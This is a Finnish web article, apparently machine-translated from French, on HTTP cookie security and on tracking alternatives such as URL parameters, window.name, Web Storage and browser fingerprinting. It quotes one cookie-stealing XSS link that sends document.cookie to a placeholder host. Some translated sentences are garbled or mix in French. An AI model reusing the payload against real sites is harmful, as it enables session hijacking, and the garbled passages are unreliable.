Toinen tapa varastaa evästeitä on komentoa sivustoja ja asettaa selain itse lähettämään evästeitä haitallisille palvelimille, jotka eivät koskaan vastaanota niitä. Nykyaikaiset selaimet mahdollistavat haluttujen koodin osien suorittamisen palvelimelta. Jos evästeitä käytetään ajon aikana, niiden arvot voidaan välittää jossain muodossa palvelimille, joiden ei pitäisi käyttää niitä. Evästeiden salaus ennen niiden lähettämistä verkon kautta ei auta estämään hyökkäystä.

Tämän tyyppistä sivuston sisäistä komentosarjaa käyttävät yleensä hyökkääjät sivustoissa, joissa käyttäjät voivat lähettää HTML-sisältöä. Integroimalla osan yhteensopivasta koodista HTML-sisältöön hyökkääjä voi vastaanottaa evästeitä muilta käyttäjiltä. Tietoa näistä evästeistä voidaan käyttää muodostamalla yhteys samalle sivustolle varastettujen evästeiden avulla, jolloin hänet tunnistetaan käyttäjäksi, jonka evästeet varastettiin.

Yksi tapa estää tällaiset hyökkäykset on käyttää HttpOnly-lippua; se on vaihtoehto, joka on otettu käyttöön PHP:n Internet Explorerin versiosta 6 lähtien versiosta 5.2.0 lähtien ja jonka on suunniteltu estävän evästeen komentosarjan lähellä oleva asiakas. Verkkokehittäjien tulee kuitenkin ottaa tämä huomioon sivuston kehittämisessä, jotta he ovat immuuneja sivuston komentosarjalle.

Toinen käytetty turvallisuusuhka on kysynnän valmistus sivustolla.

Virallinen tekninen eritelmä sallii evästeiden lähettämisen takaisin vain palvelimille sillä verkkotunnuksella, josta ne ovat peräisin. Evästeiden arvo voidaan kuitenkin lähettää muille palvelimille käyttämällä muita keinoja kuin evästeotsikoita.

Erityisesti komentosarjakielet, kuten JavaScript, saavat yleensä käyttää evästearvoja, ja ne voivat lähettää mielivaltaisia ​​arvoja mille tahansa Internetin palvelimelle. Tätä komentosarjaominaisuutta käytetään verkkosivustoilla, joiden avulla käyttäjät voivat lähettää HTML-sisältöä muiden käyttäjien nähtäväksi.

Esimerkiksi verkkotunnuksessa example.com toimiva hyökkääjä saattaa lähettää kommentin, joka sisältää seuraavan linkin, joka osoittaa suosittuun blogiin, jota he eivät muuten hallitse:

<a href="#" onclick="window.location = 'http://exemple.com/stole.cgi?text=' + escape(document.cookie); return false;">Cliquez ici !</a>

Kun toinen käyttäjä napsauttaa tätä linkkiä, selain suorittaa koodin onclick-attribuutin osan, joten se korvaa document.cookie-merkkijonon tällä sivulla aktiivisten käyttäjän evästeiden luettelolla. Siksi tämä luettelo evästeistä lähetetään example.com-palvelimelle, ja hyökkääjä voi siksi kerätä tämän käyttäjän evästeet.

Tämän tyyppistä hyökkäystä on vaikea havaita käyttäjän puolella, koska komentosarja tulee samasta verkkotunnuksesta, joka asetti evästeen, ja arvojen lähetystoiminto näyttää olevan kyseisen verkkotunnuksen valtuutettu. Katsotaan, että tämän tyyppisiä sivustoja ylläpitävien ylläpitäjien vastuulla on asettaa rajoituksia, jotka estävät haitallisen koodin julkaisemisen.

Evästeet eivät näy suoraan asiakaspuolen ohjelmille, kuten JavaScriptille, jos ne on lähetetty HttpOnly-lipulla. Palvelimen näkökulmasta ainoa ero on, että Set-Cookie-otsikon riville on lisätty uusi kenttä, joka sisältää merkkijonon HttpOnly:

Set-Cookie: RMID=732423sdfs73242; expires=Fri, 31-Dec-2010 23:59:59 GMT; path=/; domain=.exemple.net; HttpOnly

Kun selain vastaanottaa tällaisen evästeen, sen oletetaan käyttävän sitä normaalisti seuraavassa HTTP-vaihdossa, mutta ilman, että se tulee näkyviin asiakaspuolella suoritetuille skripteille. HttpOnly-lippu ei ole osa virallista teknistä eritelmää, eikä sitä ole otettu käyttöön kaikissa selaimissa. Huomaa, että tällä hetkellä ei ole mitään keinoa estää istunnon evästeiden lukemista ja kirjoittamista XMLHTTPRequest-menetelmällä.

Sisällön muuttaminen: Hyökkääjä lähettää palvelimelle virheellisen evästeen, joka on mahdollisesti tehty palvelimen lähettämästä kelvollisesta evästeestä.

Heti kun evästeet on tallennettava ja palautettava muuttumattomina palvelimelle, hyökkääjä voi muuttaa evästeiden arvoa ennen kuin ne lähetetään takaisin palvelimelle. Jos esimerkiksi eväste sisältää kokonaisarvon, joka käyttäjän on maksettava kaupan ostoskoriin asetetuista tuotteista, tämän arvon muuttaminen altistaa palvelimen riskille veloittaa hyökkääjältä lähtöhintaa alhaisemman hinnan. Evästeiden arvon muuttamisprosessia kutsutaan evästeen myrkytys ja sitä voidaan käyttää evästeen varastamisen jälkeen hyökkäyksen jatkuvan tekemiseen.

Evästeiden ohitusmenetelmässä hyökkääjä käyttää selaimen häiriötä lähettääkseen palvelimelle virheellisen evästeen.

Useimmat verkkosivustot tallentavat kuitenkin itse evästeeseen vain istuntotunnuksen – satunnaisesti luodun yksilöllisen numeron, jota käytetään istunnon käyttäjän tunnistamiseen, kun taas kaikki muut tiedot tallennetaan palvelimelle. Tässä tapauksessa tämä ongelma on suurelta osin ratkaistu.

Jokaisella sivustolla odotetaan olevan omat evästeensä, joten yhden sivuston ei pitäisi pystyä muokkaamaan tai luomaan toiseen sivustoon liittyviä evästeitä. Verkkoselaimen tietoturvavirhe voi antaa haitallisten sivustojen rikkoa tätä sääntöä. Tällaisen puutteen hyväksikäyttöä kutsutaan yleisesti nimellä ruoanlaitto eri paikoissa. Tällaisten hyökkäysten tarkoitus voi olla istuntotunnuksen varkaus.

Käyttäjien tulee käyttää verkkoselaimien uusimpia versioita, joissa nämä haavoittuvuudet on käytännössä poistettu.

Ristiriitatilanne asiakkaan ja palvelimen välillä

Evästeiden käyttö voi aiheuttaa ristiriidan asiakkaan tilan ja evästeeseen tallennetun tilan välillä. Jos käyttäjä hankkii evästeen ja napsauttaa selaimen "Takaisin"-painiketta, selaimen tila ei yleensä ole sama kuin ennen tätä hankintaa. Esimerkiksi jos verkkokaupan kori luodaan evästeiden avulla, korin sisältö ei voi muuttua, kun käyttäjä palaa selainhistoriaan: jos käyttäjä painaa painiketta lisätäkseen tuotteen ostoskoriin ja napsauttaa "Palauta" " -painiketta, artikkeli jää tähän. Tämä ei ehkä ole käyttäjän tarkoitus, vaan hän haluaa varmasti peruuttaa artikkelin lisäämisen. Tämä voi johtaa epäluotettavuuteen, sekaannukseen ja virheisiin. Joten verkkokehittäjien tulisi olla tietoisia tästä ongelmasta ja ryhtyä toimiin tällaisten tilanteiden käsittelemiseksi.

Tietosuoja-alan asiantuntijat ovat kritisoineet pysyviä evästeitä siitä, etteivät ne vanhene riittävän pian, jolloin verkkosivustot voivat seurata käyttäjiä ja rakentaa profiiliaan ajan myötä. Tämä evästeiden osa on myös osa istunnon kaappausongelmaa, koska varastettua pysyvää evästettä voidaan käyttää esiintymään käyttäjänä huomattavan ajan.

Lue myös: GAFAM: keitä he ovat? Miksi ne ovat (joskus) niin pelottavia?

Vaihtoehtoja evästeille

Jotkut evästeiden avulla suoritettavat toiminnot voidaan suorittaa myös muilla mekanismeilla, jotka ohittavat evästeet tai luovat poistetut evästeet uudelleen, mikä aiheuttaa tietosuojaongelmia samalla tavalla (tai joskus pahempia, koska ne ovat näkymättömiä) kuin evästeet.

IP-osoite

Käyttäjiä voidaan seurata sivulle kutsuvan tietokoneen IP-osoitteella. Tämä tekniikka on ollut käytettävissä World Wide Webin käyttöönotosta lähtien, kun sivuja ladataan, palvelin pyytää selaimen tai välityspalvelimen käyttävän tietokoneen IP-osoitetta, jos sellaista ei käytetä. Palvelin voi seurata näitä tietoja riippumatta siitä, onko evästeitä käytössä vai ei. Nämä osoitteet ovat kuitenkin tyypillisesti vähemmän luotettavia käyttäjän tunnistamisessa kuin evästeet, koska useat käyttäjät voivat jakaa tietokoneita ja välityspalvelimia ja sama tietokone voi saada eri IP-osoitteen jokaisessa työistunnossa (kuten puhelinyhteyksissä usein). .

IP-osoitteiden seuranta voi olla luotettavaa joissakin tilanteissa, kuten laajakaistayhteyksissä, jotka säilyttävät saman IP-osoitteen pitkään, niin kauan kuin virta on päällä.

Jotkut järjestelmät, kuten Tor, on suunniteltu säilyttämään Internetin nimettömyys ja tekemään IP-osoitteen seurannasta mahdotonta tai epäkäytännöllistä.

URL

Tarkempi tekniikka perustuu tietojen upottamiseen URL-osoitteisiin. URL-osoitteen kyselymerkkijono-osa on yksi tekniikka, jota tyypillisesti käytetään tähän tarkoitukseen, mutta myös muita osia voidaan käyttää. Sekä Java-palvelinletti että PHP-istuntomekanismit käyttävät tätä menetelmää, jos evästeet eivät ole käytössä.

Tässä menetelmässä verkkopalvelin liittää merkkijonopyynnöt sen välittävän verkkosivun linkkeihin, kun se lähetetään selaimeen. Kun käyttäjä seuraa linkkiä, selain palauttaa liitteenä olevan kyselymerkkijonon palvelimelle.

Tähän tarkoitukseen käytetyt kyselymerkkijonot ja evästeet ovat hyvin samankaltaisia, sillä molemmat ovat palvelimen mielivaltaisesti valitsemia ja selaimen palauttamia tietoja. Joitakin eroja kuitenkin on: kun kyselymerkkijonon sisältävää URL-osoitetta käytetään uudelleen, samat tiedot lähetetään palvelimelle. Jos esimerkiksi käyttäjän asetukset on koodattu URL-osoitteen kyselymerkkijonoon ja käyttäjä lähettää URL-osoitteen toiselle käyttäjälle sähköpostitse, tämä käyttäjä voi myös käyttää näitä asetuksia.

Toisaalta, kun käyttäjä siirtyy samalle sivulle kahdesti, ei ole takeita siitä, että samaa kyselymerkkijonoa käytetään molemmilla kerroilla. Jos käyttäjä esimerkiksi päätyy sivulle sisäiseltä sivulta ensimmäisen kerran ja päätyy samalle sivulle ulkoiselta sivulta toisen kerran, kyselymerkkijono suhteessa sivuston sivuun on yleensä erilainen, kun taas evästeet ovat samat. .

Muut kyselymerkkijonojen haitat liittyvät turvallisuuteen: istunnon tunnistavien tietojen säilyttäminen kyselymerkkijonoissa mahdollistaa tai yksinkertaistaa istunnon kiinnityshyökkäykset, tunnisteviittaushyökkäykset ja muut hyväksikäytöt. Istuntotunnusten välittäminen HTTP-evästeenä on turvallisempaa.

Piilotettu lomakekenttä

Eräs ASP.NET:n käyttämä istunnonseurannan muoto on käyttää piilotettuja kenttiä sisältäviä verkkolomakkeita. Tämä tekniikka on hyvin samanlainen kuin URL-kyselymerkkijonojen käyttäminen tiedon välittämiseen, ja sillä on samat edut ja haitat. ja jos lomake käsitellään HTTP GET -menetelmällä, kentistä tulee itse asiassa osa sen selaimen URL-osoitetta, joka lähettää sen lomaketta lähetettäessä. Useimmat lomakkeet käsitellään kuitenkin HTTP POST:lla, jolloin lomakkeen tiedot, mukaan lukien piilotetut kentät, lisätään lisäsyötteenä, joka ei ole osa URL-osoitetta eikä evästettä.

Tällä lähestymistavalla on kaksi etua seurannan näkökulmasta: Ensinnäkin HTML-lähdekoodiin ja POST-syötteeseen sijoitettujen tietojen seuranta URL-osoitteen sijaan antaa keskivertokäyttäjälle mahdollisuuden välttää tämä seuranta. toiseksi istuntotietoja ei kopioida, kun käyttäjä kopioi URL-osoitteen (esimerkiksi tallentaakseen sivun levylle tai lähettääkseen sen sähköpostitse).

ikkuna.nimi

Kaikki yleiset verkkoselaimet voivat tallentaa melkoisen määrän tietoa (2 Mt - 32 Mt) JavaScriptin kautta käyttämällä DOM:n window.name-ominaisuutta. Näitä tietoja voidaan käyttää istuntoevästeiden sijasta, ja niitä käytetään myös eri verkkotunnuksissa. Tekniikka voidaan yhdistää JSON-objekteihin monimutkaisen asiakaspuolen istuntomuuttujien joukon tallentamiseksi.

Huono puoli on, että jokaisessa erillisessä ikkunassa tai välilehdessä on aluksi tyhjä ikkuna.nimi; kun selaat välilehtiä (käyttäjän avaamia), tämä tarkoittaa, että yksitellen avatuilla välilehdillä ei ole ikkunan nimeä. Lisäksi window.name voidaan käyttää vierailijoiden seuraamiseen eri sivustoilla, mikä voi aiheuttaa tietosuojaongelmia.

Joissain suhteissa tämä voi olla turvallisempi kuin evästeet, koska palvelin ei ole mukana, mikä tekee siitä haavoittumattoman haistavien evästeiden verkkohyökkäykselle. Jos tiedot kuitenkin suojataan erityisillä toimenpiteillä, se on alttiina uusille hyökkäyksille, koska tiedot ovat saatavilla muiden samassa ikkunassa avattujen sivustojen kautta.

HTTP-todennus

HTTP-protokolla sisältää peruspääsyn todennusprotokollat ​​ja pääsyntunnistuskoosteen, joka mahdollistaa pääsyn verkkosivulle vain, kun käyttäjä on antanut käyttäjätunnuksen ja salasanan. Jos palvelin pyytää varmennetta pääsyn myöntämiseen verkkosivulle, selain pyytää sitä käyttäjältä ja saatuaan selain tallentaa sen ja lähettää sen kaikissa myöhemmissä HTTP-pyynnöissä. Näitä tietoja voidaan käyttää käyttäjän jäljittämiseen.

Paikallinen jaettu objekti

Jos selain sisältää Adobe Flash Player -laajennuksen, paikalliset jaetut objektit voidaan käyttää samaan tarkoitukseen kuin evästeitä. Ne voivat olla houkutteleva valinta verkkokehittäjille, koska:

  • oletuskokorajoitus paikalliselle jaetulle objektille on 100 kt;
  • turvatarkistukset ovat erillisiä käyttäjän evästetarkistuksista (joten paikalliset jaetut objektit voidaan sallia, kun evästeet eivät ole).

Tämä viimeinen kohta, joka erottaa evästeiden hallintakäytännön Adoben paikallisten jaettujen objektien käytännöstä herättää kysymyksiä koskien käyttäjän tietosuoja-asetusten hallintaa: hänen on oltava tietoinen siitä, että hänen evästeiden hallintallaan ei ole vaikutusta paikallisten jaettujen objektien hallintaan ja päinvastoin.

Toinen tämän järjestelmän kritiikki on, että sitä voidaan käyttää vain Adobe Flash Player -laajennuksen kautta, joka on patentoitu eikä verkkostandardi.

Asiakaspuolen sinnikkyys

Jotkut verkkoselaimet tukevat skriptipohjaista pysyvyysmekanismia, jonka avulla sivu voi tallentaa tietoja paikallisesti myöhempää käyttöä varten. Esimerkiksi Internet Explorer tukee pysyviä tietoja selainhistoriassa, kirjanmerkkejä, XML:ään tallennetussa muodossa tai suoraan levylle tallennetun Web-sivun kanssa. Microsoft Internet Explorer 5:ssä on DHTML-käyttäytymisen kautta käytettävissä oleva käyttäjätietojen menetelmä.

W3C esitteli HTML 5:ssä uuden JavaScript-sovellusliittymän asiakaspuolen tietojen tallennukseen nimeltä Web-tallennus, ja sen tarkoituksena oli korvata evästeet pysyvästi. Se on samanlainen kuin evästeet, mutta sillä on huomattavasti parannettu kapasiteetti ja ilman tietojen tallentamista HTTP-pyyntöjen otsikkoon. API sallii kahden tyyppisen verkkotallennustilan: paikallistallennus ja istuntotallennus, jotka ovat samanlaisia ​​kuin pysyviä evästeitä ja istuntoevästeitä (paitsi että istuntoevästeet vanhenevat, kun selain suljetaan istunnon tallennus vanhenee, kun välilehti suljetaan), vastaavasti. Verkkotallennustilaa tukevat Mozilla Firefox 3.5, Google Chrome 5, Apple Safari 4, Microsoft Internet Explorer 8 ja Opera 10.50.

Erilainen mekanismi perustuu tavallisesti selaimen välimuistiin (muistiin päivityksen sijaan) käyttämällä JavaScript-ohjelmia verkkosivuilla. 

Sivu voi esimerkiksi sisältää tunnisteen . La première fois que la page se charge, le programme exemple.js est aussi chargé. 

Tässä vaiheessa ohjelma jää välimuistiin eikä vierailtua sivua ladata uudelleen toista kertaa. Näin ollen, jos ohjelma sisältää yleisen muuttujan (esimerkiksi var id = 3243242;), tämä tunniste pysyy voimassa ja sitä voidaan hyödyntää muulla JavaScript-koodilla, kun sivu ladataan uudelleen tai kun ohjelmaan linkittävä sivu ladataan. 

Tämän menetelmän suurin haittapuoli on, että JavaScriptin globaalin muuttujan on oltava staattinen, eli sitä ei voi muuttaa tai poistaa evästeen tavoin.

verkkoselaimen sormenjälki

Selaimen sormenjälki on tietoa, joka kerätään selaimen kokoonpanoasetuksista tunnistamista varten. Näitä sormenjälkiä voidaan käyttää Internetin käyttäjän tai laitteen tunnistamiseen kokonaan tai osittain, vaikka evästeet olisi poistettu käytöstä.

Web-selaimen peruskonfiguraatiotiedot ovat jo pitkään keränneet verkkosivustojen yleisöpalvelut mittaamaan tarkasti ihmisten verkkoliikennettä ja havaitsemaan erilaisia ​​napsautuspetoksia. Asiakaspuolen komentosarjakielten avulla tiedonkeruu on paljon tarkempaa nyt mahdollista.

Näiden tietojen muuntaminen bittijonoksi tuottaa laitteen sormenjäljen. Vuonna 2010 Electronic Frontier Foundation (EFF) mittasi selaimen sormenjäljen entropian olevan vähintään 18,1 bittiä, ja se oli ennen kuin kankaalle tehty sormenjälki lisäsi 5,7 bittiä tähän entropiaan.

Evästeet pähkinänkuoressa

Evästeet ovat pieniä tekstitiedostoja, jotka selain tallentaa verkkosivuston vierailijan kiintolevylle ja joita käytetään (muun muassa) tallentamaan tietoja vierailijasta tai hänen matkastaan ​​sivuston läpi. Verkkovastaava voi siten tunnistaa vierailijan tavat ja räätälöidä sivustonsa esityksen kullekin kävijälle; evästeiden avulla on mahdollista muistaa, kuinka monta artikkelia kotisivulla on näytettävä, tai jopa säilyttää minkä tahansa yksityisen osapuolen kirjautumistiedot: kun vierailija palaa sivustolle, hänen ei enää tarvitse kirjoittaa nimeään ja salasanaansa tunnistaa, koska ne luetaan automaattisesti evästeessä.

Evästeellä on rajoitettu käyttöikä, jonka sivuston suunnittelija on määrittänyt. Ne voivat myös vanhentua sivuston istunnon lopussa, mikä vastaa selaimen sulkemista. Evästeitä käytetään laajalti helpottamaan vierailijoiden elämää ja tarjoamaan heille merkityksellisempää tietoa. Mutta erikoistekniikat mahdollistavat vierailijan seuraamisen useilla sivustoilla ja siten hänen tottumuksistaan ​​erittäin laajan tiedon keräämisen ja ristiintarkastuksen. Tämä menetelmä on antanut evästeiden käytölle maineen vierailijoiden yksityisyyttä loukkaavana valvontatekniikkana, mikä valitettavasti vastaa todellisuutta monissa käyttötapauksissa ei-teknisistä syistä tai käyttäjien odotuksia vastaisesti.

Vastauksena näihin oikeutettuihin peloihin HTML 5 esittelee uuden JavaScript-sovellusliittymän asiakaspuolen tietojen tallennukseen nimeltä Web-tallennus, joka on paljon turvallisempi ja suuremmalla kapasiteetilla ja jonka tarkoituksena on korvata evästeet.

Evästeiden säilytys

Joillakin selaimilla eväste on helposti muokattavissa, yksinkertainen tekstieditori, kuten Notepad, riittää muuttamaan sen arvoja manuaalisesti.

Evästeet tallennetaan eri tavalla selaimesta riippuen:

  • Microsoft Internet Explorer tallentaa jokaisen evästeen eri tiedostoon;
  • Mozilla Firefox tallentaa kaikki evästeensä yhteen tiedostoon;
  • Opera tallentaa kaikki evästeensä yhteen tiedostoon ja salaa ne (niitä ei voi muokata paitsi ohjelmiston asetuksissa);
  • Apple Safari tallentaa kaikki evästeensä yhteen .plist-tiedostoon. Muokkaus on mahdollista, mutta ei kovin helppoa, ellet käy läpi ohjelmistovaihtoehtoja.

Selaimet vaaditaan tukemaan ainakin :

  • 300 samanaikaista evästettä;
  • 4 o per eväste;
  • 20 evästettä isäntä tai verkkotunnus kohden.
[Kaikki yhteensä: 0 Tarkoittaa: 0]

Kirjoittanut Arvioi toimittajat

Asiantuntijatoimittajaryhmä viettää aikaa tuotteidensa tutkimiseen, käytännön kokeiden suorittamiseen, alan ammattilaisten haastatteluun, kuluttaja-arvostelujen tarkasteluun ja kaikkien tulostemme kirjoittamiseen ymmärrettävinä ja kattavina yhteenvetoina.

Jätä kommentti

Sähköpostiosoitettasi ei julkaista. Pakolliset kentät on merkitty *

Mitä mieltä olet?

384 Points
upvote äänestää kumoon